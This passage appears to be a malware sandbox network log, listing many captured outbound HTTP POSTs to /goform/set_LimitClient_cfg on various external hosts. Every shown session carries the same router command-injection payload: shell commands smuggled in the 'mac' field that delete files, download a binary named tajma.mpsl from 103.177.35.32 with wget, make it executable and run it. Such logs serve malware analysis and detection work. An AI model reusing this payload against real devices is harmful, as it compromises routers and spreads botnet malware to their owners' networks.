                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1968192.168.2.2345154222.11.153.98080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435450077 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1969192.168.2.234984065.86.59.1858080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435580015 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1970192.168.2.2344424166.170.223.158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435611963 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1971192.168.2.2338006149.182.59.1108080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435632944 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1972192.168.2.2340566219.151.203.1948080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435682058 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1973192.168.2.2346196160.103.111.848080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435698032 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1974192.168.2.23572628.133.86.1818080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435725927 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1975192.168.2.234863259.216.97.2238080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435764074 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1976192.168.2.234225434.160.100.2068080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435769081 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1977192.168.2.2352410100.237.117.478080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435786009 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1978192.168.2.235308288.93.234.2018080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435834885 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1979192.168.2.2343772123.75.186.1928080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435862064 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1980192.168.2.235410273.99.87.1138080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.435902119 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1981192.168.2.2357474116.134.18.358080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436012030 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1982192.168.2.2338712169.28.49.1208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436058998 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1983192.168.2.234637067.114.124.2488080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436161041 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1984192.168.2.2334440137.101.139.2348080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436207056 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1985192.168.2.2342266122.45.36.1188080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436260939 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1986192.168.2.235418470.219.10.448080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436299086 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1987192.168.2.233518659.59.114.2128080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436309099 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1988192.168.2.234668444.99.24.1288080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436331987 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1989192.168.2.234515476.216.61.2498080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436513901 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1990192.168.2.233993477.86.90.2178080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.436537027 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
